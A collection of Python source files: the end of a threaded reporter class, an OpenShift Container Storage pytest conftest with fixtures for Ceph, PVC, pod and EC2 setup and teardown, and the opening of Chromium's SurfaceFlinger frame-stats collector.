# self.__thrd_task__.setDaemon(True)
self.__thrd_task__.start()
print("report thread started")
def __do_report_init_data__(self):
objInitData = dict()
objInitData["pid"] = self.__id__
objInitData["strategies"] = self.stra_names
self.rpt_init_data_impl(objInitData)
def __do_report_settle_data__(self):
print("settle data reporter triggered")
def report_rt_data(self):
print("rt data reporter triggered")
self.__tasks__.append(self.TaskReportRTData)
if self.__thrd_task__ is None:
self.__start__()
def report_settle_data(self):
self.__tasks__.append(self.TaskReportSettleData)
if self.__thrd_task__ is None:
self.__start__()
def report_init_data(self):
self.__tasks__.append(self.TaskReportInitData)
if self.__thrd_task__ is None:
self.__start__()
|
conftest.py
|
import logging
import os
import tempfile
import pytest
import threading
from datetime import datetime
import random
from math import floor
from ocs_ci.utility.utils import TimeoutSampler, get_rook_repo
from ocs_ci.ocs.exceptions import TimeoutExpiredError
from ocs_ci.utility.spreadsheet.spreadsheet_api import GoogleSpreadSheetAPI
from ocs_ci.utility import aws
from ocs_ci.framework import config
from ocs_ci.framework.pytest_customization.marks import (
deployment, destroy, ignore_leftovers
)
from ocs_ci.utility.environment_check import (
get_status_before_execution, get_status_after_execution
)
from ocs_ci.utility.utils import (
get_openshift_client, ocsci_log_path, get_testrun_name
)
from ocs_ci.deployment import factory as dep_factory
from tests import helpers
from ocs_ci.ocs import constants, ocp, defaults, node, platform_nodes
from ocs_ci.ocs.resources.ocs import OCS
from ocs_ci.ocs.resources.pvc import PVC
log = logging.getLogger(__name__)
class OCSLogFormatter(logging.Formatter):
def __init__(self):
fmt = (
"%(asctime)s - %(levelname)s - %(name)s.%(funcName)s.%(lineno)d "
"- %(message)s"
)
super(OCSLogFormatter, self).__init__(fmt)
def pytest_logger_config(logger_config):
logger_config.add_loggers([''], stdout_level='info')
logger_config.set_log_option_default('')
logger_config.split_by_outcome()
logger_config.set_formatter_class(OCSLogFormatter)
@pytest.fixture(scope='class')
def secret_factory_class(request):
return secret_factory_fixture(request)
@pytest.fixture(scope='function')
def secret_factory(request):
return secret_factory_fixture(request)
def secret_factory_fixture(request):
"""
Secret factory. Calling this fixture creates a new secret.
RBD based is default.
"""
instances = []
def factory(interface=constants.CEPHBLOCKPOOL):
"""
Args:
interface (str): CephBlockPool or CephFileSystem. This decides
whether a RBD based or CephFS resource is created.
RBD is default.
"""
secret_obj = helpers.create_secret(
interface_type=interface
)
assert secret_obj, "Failed to create a secret"
instances.append(secret_obj)
return secret_obj
def finalizer():
"""
Delete the RBD secrets
"""
for instance in instances:
instance.delete()
instance.ocp.wait_for_delete(
instance.name
)
request.addfinalizer(finalizer)
return factory
@pytest.fixture(scope='class')
def ceph_pool_factory_class(request):
return ceph_pool_factory_fixture(request)
@pytest.fixture(scope='function')
def ceph_pool_factory(request):
return ceph_pool_factory_fixture(request)
def ceph_pool_factory_fixture(request):
"""
Create a Ceph pool factory.
Calling this fixture creates new Ceph pool instance.
"""
instances = []
def factory(interface=constants.CEPHBLOCKPOOL):
if interface == constants.CEPHBLOCKPOOL:
ceph_pool_obj = helpers.create_ceph_block_pool()
elif interface == constants.CEPHFILESYSTEM:
cfs = ocp.OCP(
kind=constants.CEPHFILESYSTEM,
namespace=defaults.ROOK_CLUSTER_NAMESPACE
).get(defaults.CEPHFILESYSTEM_NAME)
ceph_pool_obj = OCS(**cfs)
assert ceph_pool_obj, f"Failed to create {interface} pool"
if interface != constants.CEPHFILESYSTEM:
instances.append(ceph_pool_obj)
return ceph_pool_obj
def finalizer():
"""
Delete the Ceph block pool
"""
for instance in instances:
instance.delete()
instance.ocp.wait_for_delete(
instance.name
)
request.addfinalizer(finalizer)
return factory
@pytest.fixture(scope='class')
def storageclass_factory_class(
request,
ceph_pool_factory_class,
secret_factory_class
):
return storageclass_factory_fixture(
request,
ceph_pool_factory_class,
secret_factory_class
)
@pytest.fixture(scope='function')
def storageclass_factory(
request,
ceph_pool_factory,
secret_factory
):
return storageclass_factory_fixture(
request,
ceph_pool_factory,
secret_factory
)
def storageclass_factory_fixture(
request,
ceph_pool_factory,
secret_factory,
):
"""
Create a storage class factory. Default is RBD based.
Calling this fixture creates new storage class instance.
"""
instances = []
def factory(
interface=constants.CEPHBLOCKPOOL,
secret=None,
custom_data=None,
sc_name=None,
reclaim_policy=constants.RECLAIM_POLICY_DELETE
):
"""
Args:
interface (str): CephBlockPool or CephFileSystem. This decides
whether a RBD based or CephFS resource is created.
RBD is default.
secret (object): An OCS instance for the secret.
custom_data (dict): If provided then storageclass object is created
by using these data. Parameters `block_pool` and `secret`
are not useds but references are set if provided.
sc_name (str): Name of the storage class
Returns:
object: helpers.create_storage_class instance with links to
block_pool and secret.
"""
if custom_data:
sc_obj = helpers.create_resource(**custom_data)
else:
secret = secret or secret_factory(interface=interface)
ceph_pool = ceph_pool_factory(interface)
if interface == constants.CEPHBLOCKPOOL:
interface_name = ceph_pool.name
elif interface == constants.CEPHFILESYSTEM:
interface_name = helpers.get_cephfs_data_pool_name()
sc_obj = helpers.create_storage_class(
interface_type=interface,
interface_name=interface_name,
secret_name=secret.name,
sc_name=sc_name,
reclaim_policy=reclaim_policy
)
assert sc_obj, f"Failed to create {interface} storage class"
sc_obj.ceph_pool = ceph_pool
sc_obj.secret = secret
instances.append(sc_obj)
return sc_obj
def finalizer():
"""
Delete the Ceph block pool
"""
for instance in instances:
instance.delete()
instance.ocp.wait_for_delete(
instance.name
)
request.addfinalizer(finalizer)
return factory
@pytest.fixture()
def project_factory_class(request):
return project_factory_fixture(request)
@pytest.fixture()
def project_factory(request):
return project_factory_fixture(request)
def project_factory_fixture(request):
"""
Create a new project factory.
Calling this fixture creates new project.
"""
instances = []
def factory():
"""
Returns:
object: ocs_ci.ocs.resources.ocs instance of 'Project' kind.
"""
proj_obj = helpers.create_project()
instances.append(proj_obj)
return proj_obj
def finalizer():
"""
Delete the Ceph block pool
"""
for instance in instances:
ocp.switch_to_default_rook_cluster_project()
instance.delete(resource_name=instance.namespace)
instance.wait_for_delete(instance.namespace)
request.addfinalizer(finalizer)
return factory
@pytest.fixture(scope='class')
def pvc_factory_class(
request,
storageclass_factory_class,
project_factory_class
):
return pvc_factory_fixture(
request,
storageclass_factory_class,
project_factory_class
)
@pytest.fixture(scope='function')
def pvc_factory(
request,
storageclass_factory,
project_factory
):
return pvc_factory_fixture(
request,
storageclass_factory,
project_factory,
)
def pvc_factory_fixture(
request,
storageclass_factory,
project_factory
):
"""
Create a persistent Volume Claim factory. Calling this fixture creates new
PVC. For custom PVC provide 'storageclass' parameter.
"""
instances = []
active_project = None
active_rbd_storageclass = None
active_cephfs_storageclass = None
def factory(
interface=constants.CEPHBLOCKPOOL,
project=None,
storageclass=None,
size=None,
access_mode=constants.ACCESS_MODE_RWO,
custom_data=None,
status=constants.STATUS_BOUND,
volume_mode=None
):
"""
Args:
interface (str): CephBlockPool or CephFileSystem. This decides
whether a RBD based or CephFS resource is created.
RBD is default.
project (object): ocs_ci.ocs.resources.ocs.OCS instance
of 'Project' kind.
storageclass (object): ocs_ci.ocs.resources.ocs.OCS instance
of 'StorageClass' kind.
size (int): The requested size for the PVC
access_mode (str): ReadWriteOnce, ReadOnlyMany or ReadWriteMany.
This decides the access mode to be used for the PVC.
ReadWriteOnce is default.
custom_data (dict): If provided then PVC object is created
by using these data. Parameters `project` and `storageclass`
are not used but reference is set if provided.
status (str): If provided then factory waits for object to reach
desired state.
volume_mode (str): Volume mode for PVC.
eg: volume_mode='Block' to create rbd `block` type volume
Returns:
object: helpers.create_pvc instance.
"""
if custom_data:
pvc_obj = PVC(**custom_data)
pvc_obj.create(do_reload=False)
else:
nonlocal active_project
nonlocal active_rbd_storageclass
nonlocal active_cephfs_storageclass
project = project or active_project or project_factory()
active_project = project
if interface == constants.CEPHBLOCKPOOL:
storageclass = (
storageclass or active_rbd_storageclass
or storageclass_factory(interface)
)
active_rbd_storageclass = storageclass
elif interface == constants.CEPHFILESYSTEM:
storageclass = (
storageclass or active_cephfs_storageclass
or storageclass_factory(interface)
)
active_cephfs_storageclass = storageclass
pvc_size = f"{size}Gi" if size else None
pvc_obj = helpers.create_pvc(
sc_name=storageclass.name,
namespace=project.namespace,
size=pvc_size,
do_reload=False,
access_mode=access_mode,
volume_mode=volume_mode
)
assert pvc_obj, "Failed to create PVC"
if status:
helpers.wait_for_resource_state(pvc_obj, status)
pvc_obj.storageclass = storageclass
pvc_obj.project = project
pvc_obj.access_mode = access_mode
instances.append(pvc_obj)
return pvc_obj
def finalizer():
"""
Delete the PVC
"""
pv_objs = []
# Get PV form PVC instances and delete PVCs
for instance in instances:
if not instance.is_deleted:
pv_objs.append(instance.backed_pv_obj)
instance.delete()
instance.ocp.wait_for_delete(
instance.name
)
# Wait for PVs to delete
for pv_obj in pv_objs:
pv_obj.ocp.wait_for_delete(
resource_name=pv_obj.name, timeout=180
)
request.addfinalizer(finalizer)
return factory
@pytest.fixture(scope='class')
def pod_factory_class(request, pvc_factory_class):
return pod_factory_fixture(request, pvc_factory_class)
@pytest.fixture(scope='function')
def pod_factory(request, pvc_factory):
return pod_factory_fixture(request, pvc_factory)
def pod_factory_fixture(request, pvc_factory):
"""
Create a Pod factory. Calling this fixture creates new Pod.
For custom Pods provide 'pvc' parameter.
"""
instances = []
def factory(
interface=constants.CEPHBLOCKPOOL,
pvc=None,
custom_data=None,
status=constants.STATUS_RUNNING,
pod_dict_path=None,
raw_block_pv=False
):
"""
Args:
interface (str): CephBlockPool or CephFileSystem. This decides
whether a RBD based or CephFS resource is created.
RBD is default.
pvc (PVC object): ocs_ci.ocs.resources.pvc.PVC instance kind.
custom_data (dict): If provided then Pod object is created
by using these data. Parameter `pvc` is not used but reference
is set if provided.
status (str): If provided then factory waits for object to reach
desired state.
pod_dict_path (str): YAML path for the pod.
raw_block_pv (bool): True for creating raw block pv based pod,
False otherwise.
Returns:
object: helpers.create_pvc instance.
"""
if custom_data:
pod_obj = helpers.create_resource(**custom_data)
else:
pvc = pvc or pvc_factory(interface=interface)
pod_obj = helpers.create_pod(
pvc_name=pvc.name,
namespace=pvc.namespace,
interface_type=interface,
pod_dict_path=pod_dict_path,
raw_block_pv=raw_block_pv
)
assert pod_obj, "Failed to create PVC"
instances.append(pod_obj)
if status:
helpers.wait_for_resource_state(pod_obj, status)
pod_obj.reload()
pod_obj.pvc = pvc
return pod_obj
def finalizer():
"""
Delete the Pod
"""
for instance in instances:
instance.delete()
instance.ocp.wait_for_delete(
instance.name
)
request.addfinalizer(finalizer)
return factory
@pytest.fixture(scope='class')
def teardown_factory_class(request):
return teardown_factory_fixture(request)
@pytest.fixture(scope='function')
def teardown_factory(request):
return teardown_factory_fixture(request)
def teardown_factory_fixture(request):
"""
Tearing down a resource that was created during the test
To use this factory, you'll need to pass 'teardown_factory' to your test
function and call it in your test when a new resource was created and you
want it to be removed in teardown phase:
def test_example(self, teardown_factory):
pvc_obj = create_pvc()
teardown_factory(pvc_obj)
"""
instances = []
def factory(resource_obj):
"""
Args:
resource_obj (OCS object or list of OCS objects) : Object to teardown after the test
"""
if isinstance(resource_obj, list):
instances.extend(resource_obj)
else:
instances.append(resource_obj)
def finalizer():
"""
Delete the resources created in the test
"""
for instance in instances[::-1]:
if not instance.is_deleted:
instance.delete()
instance.ocp.wait_for_delete(
instance.name
)
if instance.kind == constants.PVC:
if instance.reclaim_policy == constants.RECLAIM_POLICY_DELETE:
helpers.validate_pv_delete(instance.backed_pv)
request.addfinalizer(finalizer)
return factory
@pytest.fixture()
def service_account_factory(request):
"""
Create a service account
"""
instances = []
active_service_account_obj = None
def factory(
project=None, service_account=None
):
"""
Args:
project (object): ocs_ci.ocs.resources.ocs.OCS instance
of 'Project' kind.
service_account (str): service_account_name
Returns:
object: serviceaccount instance.
"""
nonlocal active_service_account_obj
if active_service_account_obj and not service_account:
return active_service_account_obj
elif service_account:
sa_obj = helpers.get_serviceaccount_obj(sa_name=service_account, namespace=project.namespace)
if not helpers.validate_scc_policy(sa_name=service_account, namespace=project.namespace):
helpers.add_scc_policy(sa_name=service_account, namespace=project.namespace)
sa_obj.project = project
active_service_account_obj = sa_obj
instances.append(sa_obj)
return sa_obj
else:
sa_obj = helpers.create_serviceaccount(
namespace=project.namespace,
)
sa_obj.project = project
active_service_account_obj = sa_obj
helpers.add_scc_policy(sa_name=sa_obj.name, namespace=project.namespace)
assert sa_obj, "Failed to create serviceaccount"
instances.append(sa_obj)
return sa_obj
def finalizer():
"""
Delete the service account
"""
for instance in instances:
helpers.remove_scc_policy(
sa_name=instance.name,
namespace=instance.namespace
)
instance.delete()
instance.ocp.wait_for_delete(resource_name=instance.name)
request.addfinalizer(finalizer)
return factory
@pytest.fixture()
def dc_pod_factory(
request,
service_account_factory,
pvc_factory,
):
"""
Create deploymentconfig pods
"""
instances = []
def factory(
interface=constants.CEPHBLOCKPOOL,
pvc=None,
service_account=None,
size=None,
custom_data=None,
replica_count=1,
):
"""
Args:
interface (str): CephBlockPool or CephFileSystem. This decides
whether a RBD based or CephFS resource is created.
RBD is default.
pvc (PVC object): ocs_ci.ocs.resources.pvc.PVC instance kind.
service_account (str): service account name for dc_pods
size (int): The requested size for the PVC
custom_data (dict): If provided then Pod object is created
by using these data. Parameter `pvc` is not used but reference
is set if provided.
replica_count (int): Replica count for deployment config
"""
if custom_data:
dc_pod_obj = helpers.create_resource(**custom_data)
else:
pvc = pvc or pvc_factory(interface=interface, size=size)
sa_obj = service_account_factory(project=pvc.project, service_account=service_account)
dc_pod_obj = helpers.create_pod(
interface_type=interface, pvc_name=pvc.name, do_reload=False,
namespace=pvc.namespace, sa_name=sa_obj.name, dc_deployment=True,
replica_count=replica_count
)
instances.append(dc_pod_obj)
log.info(dc_pod_obj.name)
helpers.wait_for_resource_state(
dc_pod_obj, constants.STATUS_RUNNING, timeout=180
)
return dc_pod_obj
def finalizer():
"""
Delete dc pods
"""
for instance in instances:
helpers.delete_deploymentconfig(instance)
request.addfinalizer(finalizer)
return factory
@pytest.fixture(scope="session", autouse=True)
def polarion_testsuite_properties(record_testsuite_property, pytestconfig):
"""
Configures polarion testsuite properties for junit xml
"""
polarion_project_id = config.REPORTING['polarion']['project_id']
record_testsuite_property('polarion-project-id', polarion_project_id)
jenkins_build_url = config.RUN.get('jenkins_build_url')
if jenkins_build_url:
record_testsuite_property(
'polarion-custom-description', jenkins_build_url
)
polarion_testrun_name = get_testrun_name()
record_testsuite_property(
'polarion-testrun-id', polarion_testrun_name
)
record_testsuite_property(
'polarion-testrun-status-id', 'inprogress'
)
record_testsuite_property(
'polarion-custom-isautomated', "True"
)
@pytest.fixture(scope="session", autouse=True)
def cluster(request, log_cli_level):
"""
This fixture initiates deployment for both OCP and OCS clusters.
Specific platform deployment classes will handle the fine details
of action
"""
log.info(f"All logs located at {ocsci_log_path()}")
teardown = config.RUN['cli_params']['teardown']
deploy = config.RUN['cli_params']['deploy']
factory = dep_factory.DeploymentFactory()
deployer = factory.get_deployment()
# Add a finalizer to teardown the cluster after test execution is finished
if teardown:
def cluster_teardown_finalizer():
deployer.destroy_cluster(log_cli_level)
request.addfinalizer(cluster_teardown_finalizer)
log.info("Will teardown cluster because --teardown was provided")
# Download client
force_download = (
config.RUN['cli_params'].get('deploy')
and config.DEPLOYMENT['force_download_client']
)
get_openshift_client(force_download=force_download)
if deploy:
# Deploy cluster
deployer.deploy_cluster(log_cli_level)
@pytest.fixture(scope='class')
def environment_checker(request):
node = request.node
# List of marks for which we will ignore the leftover checker
marks_to_ignore = [m.mark for m in [deployment, destroy, ignore_leftovers]]
for mark in node.iter_markers():
if mark in marks_to_ignore:
return
request.addfinalizer(get_status_after_execution)
get_status_before_execution()
@pytest.fixture(scope="session")
def log_cli_level(pytestconfig):
"""
Retrieves the log_cli_level set in pytest.ini
Returns:
str: log_cli_level set in pytest.ini or DEBUG if not set
"""
return pytestconfig.getini('log_cli_level') or 'DEBUG'
@pytest.fixture(scope="session")
def run_io_in_background(request):
"""
Run IO during the test execution
"""
if config.RUN['cli_params'].get('io_in_bg'):
log.info(f"Tests will be running while IO is in the background")
g_sheet = None
if config.RUN['google_api_secret']:
g_sheet = GoogleSpreadSheetAPI("IO BG results", 0)
else:
log.warning(
"Google API secret was not found. IO won't be reported to "
"a Google spreadsheet"
)
results = list()
temp_file = tempfile.NamedTemporaryFile(
mode='w+', prefix='test_status', delete=False
)
def get_test_status():
with open(temp_file.name, 'r') as t_file:
return t_file.readline()
def set_test_status(status):
with open(temp_file.name, 'w') as t_file:
t_file.writelines(status)
set_test_status('running')
def finalizer():
"""
Delete the resources created during setup, used for
running IO in the test background
"""
set_test_status('finished')
try:
for status in TimeoutSampler(90, 3, get_test_status):
if status == 'terminated':
break
except TimeoutExpiredError:
log.warning(
"Background IO was still in progress before IO "
"thread termination"
)
if thread:
thread.join()
log.info(f"Background IO has stopped")
for result in results:
log.info(f"IOPs after FIO for pod {pod_obj.name}:")
log.info(f"Read: {result[0]}")
log.info(f"Write: {result[1]}")
if pod_obj:
pod_obj.delete()
pod_obj.ocp.wait_for_delete(resource_name=pod_obj.name)
if pvc_obj:
pvc_obj.delete()
pvc_obj.ocp.wait_for_delete(resource_name=pvc_obj.name)
if sc_obj:
sc_obj.delete()
if cbp_obj:
cbp_obj.delete()
if secret_obj:
secret_obj.delete()
request.addfinalizer(finalizer)
secret_obj = helpers.create_secret(
interface_type=constants.CEPHBLOCKPOOL
)
cbp_obj = helpers.create_ceph_block_pool()
sc_obj = helpers.create_storage_class(
interface_type=constants.CEPHBLOCKPOOL,
interface_name=cbp_obj.name,
secret_name=secret_obj.name
)
pvc_obj = helpers.create_pvc(sc_name=sc_obj.name, size='2Gi')
helpers.wait_for_resource_state(pvc_obj, constants.STATUS_BOUND)
pvc_obj.reload()
pod_obj = helpers.create_pod(
interface_type=constants.CEPHBLOCKPOOL, pvc_name=pvc_obj.name
)
helpers.wait_for_resource_state(pod_obj, constants.STATUS_RUNNING)
pod_obj.reload()
def run_io_in_bg():
"""
Run IO by executing FIO and deleting the file created for FIO on
the pod, in a while true loop. Will be running as long as
the test is running.
"""
while get_test_status() == 'running':
pod_obj.run_io('fs', '1G')
result = pod_obj.get_fio_results()
reads = result.get('jobs')[0].get('read').get('iops')
writes = result.get('jobs')[0].get('write').get('iops')
if g_sheet:
now = datetime.now().strftime("%Y-%m-%d %H:%M:%S")
g_sheet.insert_row([now, reads, writes])
results.append((reads, writes))
file_path = os.path.join(
pod_obj.get_storage_path(storage_type='fs'),
pod_obj.io_params['filename']
)
pod_obj.exec_cmd_on_pod(f'rm -rf {file_path}')
set_test_status('terminated')
log.info(f"Start running IO in the test background")
thread = threading.Thread(target=run_io_in_bg)
thread.start()
@pytest.fixture(
params=[
pytest.param({'interface': constants.CEPHBLOCKPOOL}),
pytest.param({'interface': constants.CEPHFILESYSTEM})
],
ids=["RBD", "CephFS"]
)
def interface_iterate(request):
"""
Iterate over interfaces - CephBlockPool and CephFileSystem
"""
return request.param['interface']
@pytest.fixture(scope='class')
def multi_pvc_factory_class(
storageclass_factory_class,
project_factory_class,
pvc_factory_class
):
return multi_pvc_factory_fixture(
storageclass_factory_class,
project_factory_class,
pvc_factory_class
)
@pytest.fixture(scope='function')
def multi_pvc_factory(storageclass_factory, project_factory, pvc_factory):
return multi_pvc_factory_fixture(
storageclass_factory,
project_factory,
pvc_factory
)
def multi_pvc_factory_fixture(
storageclass_factory,
project_factory,
pvc_factory
):
"""
Create a Persistent Volume Claims factory. Calling this fixture creates a
set of new PVCs. Options for PVC creation based on provided assess modes:
1. For each PVC, choose random value from the list of access modes
2. Create PVCs based on the specified distribution number of access modes.
Create sets of PVCs based on the order of access modes.
3. Create PVCs based on the specified distribution number of access modes.
The order of PVC creation is independent of access mode.
"""
def factory(
interface=constants.CEPHBLOCKPOOL,
project=None,
storageclass=None,
size=None,
access_modes=None,
access_modes_selection='distribute_sequential',
access_mode_dist_ratio=None,
status=constants.STATUS_BOUND,
num_of_pvc=1,
wait_each=False
):
"""
Args:
interface (str): CephBlockPool or CephFileSystem. This decides
whether a RBD based or CephFS resource is created.
RBD is default.
project (object): ocs_ci.ocs.resources.ocs.OCS instance
of 'Project' kind.
storageclass (object): ocs_ci.ocs.resources.ocs.OCS instance
of 'StorageClass' kind.
size (int): The requested size for the PVC
access_modes (list): List of access modes. One of the access modes
will be chosen for creating each PVC. If not specified,
ReadWriteOnce will be selected for all PVCs. To specify
volume mode, append volume mode in the access mode name
separated by '-'.
eg: ['ReadWriteOnce', 'ReadOnlyMany', 'ReadWriteMany',
'ReadWriteMany-Block']
access_modes_selection (str): Decides how to select accessMode for
each PVC from the options given in 'access_modes' list.
Values are 'select_random', 'distribute_random'
'select_random' : While creating each PVC, one access mode will
be selected from the 'access_modes' list.
'distribute_random' : The access modes in the list
'access_modes' will be distributed based on the values in
'distribute_ratio' and the order in which PVCs are created
will not be based on the access modes. For example, 1st and
6th PVC might have same access mode.
'distribute_sequential' :The access modes in the list
'access_modes' will be distributed based on the values in
'distribute_ratio' and the order in which PVCs are created
will be as sets of PVCs of same assess mode. For example,
first set of 10 will be having same access mode followed by
next set of 13 with a different access mode.
access_mode_dist_ratio (list): Contains the number of PVCs to be
created for each access mode. If not specified, the given list
of access modes will be equally distributed among the PVCs.
eg: [10,12] for num_of_pvc=22 and
access_modes=['ReadWriteOnce', 'ReadWriteMany']
status (str): If provided then factory waits for object to reach
desired state.
num_of_pvc(int): Number of PVCs to be created
wait_each(bool): True to wait for each PVC to be in status 'status'
before creating next PVC, False otherwise
Returns:
list: objects of PVC class.
"""
pvc_list = []
if wait_each:
status_tmp = status
else:
status_tmp = ""
project = project or project_factory()
storageclass = storageclass or storageclass_factory(interface)
access_modes = access_modes or [constants.ACCESS_MODE_RWO]
access_modes_list = []
if access_modes_selection == 'select_random':
for _ in range(num_of_pvc):
mode = random.choice(access_modes)
access_modes_list.append(mode)
else:
if not access_mode_dist_ratio:
num_of_modes = len(access_modes)
dist_val = floor(num_of_pvc / num_of_modes)
access_mode_dist_ratio = [dist_val] * num_of_modes
access_mode_dist_ratio[-1] = (
dist_val + (num_of_pvc % num_of_modes)
)
zipped_share = list(zip(access_modes, access_mode_dist_ratio))
for mode, share in zipped_share:
access_modes_list.extend([mode] * share)
if access_modes_selection == 'distribute_random':
random.shuffle(access_modes_list)
for access_mode in access_modes_list:
if '-' in access_mode:
access_mode, volume_mode = access_mode.split('-')
else:
volume_mode = ''
pvc_obj = pvc_factory(
interface=interface,
project=project,
storageclass=storageclass,
size=size,
access_mode=access_mode,
status=status_tmp,
volume_mode=volume_mode
)
pvc_list.append(pvc_obj)
pvc_obj.project = project
if status and not wait_each:
for pvc_obj in pvc_list:
helpers.wait_for_resource_state(pvc_obj, status)
return pvc_list
return factory
@pytest.fixture(scope="session", autouse=True)
def rook_repo(request):
get_rook_repo(
config.RUN['rook_branch'], config.RUN.get('rook_to_checkout')
)
@pytest.fixture(scope="function")
def memory_leak_function(request):
"""
Function to start Memory leak thread which will be executed parallel with test run
Memory leak data will be captured in all worker nodes for ceph-osd process
Data will be appended in /tmp/(worker)-top-output.txt file for each worker
During teardown created tmp files will be deleted
Usage:
test_case(.., memory_leak_function):
.....
median_dict = helpers.get_memory_leak_median_value()
.....
TC execution part, memory_leak_fun will capture data
....
helpers.memory_leak_analysis(median_dict)
....
"""
def finalizer():
"""
Finalizer to stop memory leak data capture thread and cleanup the files
"""
set_flag_status('terminated')
try:
for status in TimeoutSampler(90, 3, get_flag_status):
if status == 'terminated':
break
except TimeoutExpiredError:
log.warning(
"Background test execution still in progress before"
"memory leak thread terminated"
)
if thread:
thread.join()
for worker in helpers.get_worker_nodes():
if os.path.exists(f"/tmp/{worker}-top-output.txt"):
os.remove(f"/tmp/{worker}-top-output.txt")
log.info(f"Memory leak capture has stopped")
request.addfinalizer(finalizer)
temp_file = tempfile.NamedTemporaryFile(
mode='w+', prefix='test_status', delete=False
)
def get_flag_status():
with open(temp_file.name, 'r') as t_file:
return t_file.readline()
def set_flag_status(value):
with open(temp_file.name, 'w') as t_file:
t_file.writelines(value)
set_flag_status('running')
def run_memory_leak_in_bg():
"""
Function to run memory leak in background thread
Memory leak data is written in below format
date time PID USER PR NI VIRT RES SHR S %CPU %MEM TIME+ COMMAND
"""
oc = ocp.OCP(
namespace=config.ENV_DATA['cluster_namespace']
)
while get_flag_status() == 'running':
for worker in helpers.get_worker_nodes():
filename = f"/tmp/{worker}-top-output.txt"
top_cmd = f"debug nodes/{worker} -- chroot /host top -n 2 b"
with open("/tmp/file.txt", "w+") as temp:
temp.write(str(oc.exec_oc_cmd(
command=top_cmd, out_yaml_format=False
)))
temp.seek(0)
for line in temp:
if line.__contains__("ceph-osd"):
with open(filename, "a+") as f:
f.write(str(datetime.now()))
f.write(' ')
f.write(line)
log.info(f"Start memory leak data capture in the test background")
thread = threading.Thread(target=run_memory_leak_in_bg)
thread.start()
@pytest.fixture()
def aws_obj():
"""
Initialize AWS instance
Returns:
AWS: An instance of AWS class
"""
aws_obj = aws.AWS()
return aws_obj
@pytest.fixture()
def ec2_instances(request, aws_obj):
"""
Get cluster instances
Returns:
dict: The ID keys and the name values of the instances
"""
# Get all cluster nodes objects
nodes = node.get_node_objs()
# Get the cluster nodes ec2 instances
ec2_instances = aws.get_instances_ids_and_names(nodes)
assert ec2_instances, f"Failed to get ec2 instances for node {[n.name for n in nodes]}"
def finalizer():
"""
Make sure all instances are running
"""
# Getting the instances that are in status 'stopping' (if there are any), to wait for them to
# get to status 'stopped' so it will be possible to start them
stopping_instances = {
key: val for key, val in ec2_instances.items() if (
aws_obj.get_instances_status_by_id(key) == constants.INSTANCE_STOPPING
)
}
# Waiting fot the instances that are in status 'stopping'
# (if there are any) to reach 'stopped'
if stopping_instances:
for stopping_instance in stopping_instances:
instance = aws_obj.get_ec2_instance(stopping_instance.key())
instance.wait_until_stopped()
stopped_instances = {
key: val for key, val in ec2_instances.items() if (
aws_obj.get_instances_status_by_id(key) == constants.INSTANCE_STOPPED
)
}
# Start the instances
if stopped_instances:
aws_obj.start_ec2_instances(instances=stopped_instances, wait=True)
request.addfinalizer(finalizer)
return ec2_instances
@pytest.fixture()
def nodes():
"""
Return an instance of the relevant platform nodes class
(e.g. AWSNodes, VMWareNodes) to be later used in the test
for nodes related operations, like nodes restart,
detach/attach volume, etc.
"""
factory = platform_nodes.PlatformNodesFactory()
nodes = factory.get_nodes_platform()
return nodes
|
surface_stats_collector.py
|
# Copyright 2013 The Chromium Authors. All rights reserved.
# Use of this source code is governed by a BSD-style license that can be
# found in the LICENSE file.
import Queue
import datetime
import logging
import re
import threading
from pylib import android_commands
from pylib.device import device_utils
# Log marker containing SurfaceTexture timestamps.
_SURFACE_TEXTURE_TIMESTAMPS_MESSAGE = 'SurfaceTexture update timestamps'
_SURFACE_TEXTURE_TIMESTAMP_RE = r'\d+'
class SurfaceStatsCollector(object):
"""Collects surface stats for a SurfaceView from the output of SurfaceFlinger.
Args:
device: A DeviceUtils instance.
"""
def __init__(self, device):
# TODO(jbudorick) Remove once telemetry gets switched over.
if isinstance(device, android_commands.AndroidCommands):
device = device_utils.DeviceUtils(device)
self._device = device
self._collector_thread = None
self._surface_before = None
self._get_data_event = None
self._data_queue = None
self._stop_event = None
self._warn_about_empty_data = True
def DisableWarningAboutEmptyData(self):
self._warn_about_empty_data = False
def Start(self):
assert not self._collector_thread
if self._ClearSurfaceFlingerLatencyData():
self._get_data_event = threading.Event()
self._stop_event = threading.Event()
self._data_queue = Queue.Queue()
self._collector_thread = threading.Thread(target=self._CollectorThread)
self._collector_thread.start()
else:
raise Exception('SurfaceFlinger not supported on this device.')
def Stop(self):
assert self._collector_thread
(refresh_period, timestamps) = self._GetDataFromThread()
if self._collector_thread:
self._stop_event.set()
self._collector_thread.join()
self._collector_thread = None
return (refresh_period, timestamps)
def _CollectorThread(self):
last_timestamp = 0
timestamps = []
retries = 0
while not self._stop_event.is_set():
self._get_data_event.wait(1)
try:
refresh_period, new_timestamps = self._GetSurfaceFlingerFrameData()
if refresh_period is None or timestamps is None:
retries += 1
if retries < 3:
continue
if last_timestamp:
# Some data has already been collected, but either the app
# was closed or there's no new data. Signal the main thread and
# wait.
self._data_queue.put((None, None))
self._stop_event.wait()
break
raise Exception('Unable to get surface flinger latency data')
timestamps += [timestamp for timestamp in new_timestamps
if timestamp > last_timestamp]
if len(timestamps):
last_timestamp = timestamps[-1]
if self._get_data_event.is_set():
self._get_data_event.clear()
self._data_queue.put((refresh_period, timestamps))
timestamps = []
except Exception as e:
# On any error, before aborting, put the exception into _data_queue to
# prevent the main thread from waiting at _data_queue.get() infinitely.
self._data_queue.put(e)
raise
def _GetDataFromThread(self):
self._get_data_event.set()
ret = self._data_queue.get()
if isinstance(ret, Exception):
raise ret
return ret
def _ClearSurfaceFlingerLatencyData(self):
"""Clears the SurfaceFlinger latency data.
Returns:
True if SurfaceFlinger latency is supported by the device, otherwise
False.
"""
# The command returns nothing if it is supported, otherwise returns many
# lines of result just like 'dumpsys SurfaceFlinger'.
results = self._device.RunShellCommand(
'dumpsys SurfaceFlinger --latency-clear SurfaceView')
return not len(results)
def GetSurfaceFlingerPid(self):
results = self._device.RunShellCommand('ps | grep surfaceflinger')
if not results:
raise Exception('Unable to get surface flinger process id')
pid = results[0].split()[1]
return pid
def _GetSurfaceFlingerFrameData(self):
"""Returns collected SurfaceFlinger frame timing data.
Returns:
A tuple containing:
- The display's nominal refresh period in milliseconds.
- A list of timestamps signifying frame presentation times in
milliseconds.
The return value may be (None, None) if there was no data collected (for
example, if the app was closed before the collector thread has finished).
"""
# adb shell dumpsys SurfaceFlinger --latency <window name>
# prints some information about the last 128 frames displayed in
# that window.
# The data returned looks like this:
# 16954612
# 7657467895508 7657482691352 7657493499756
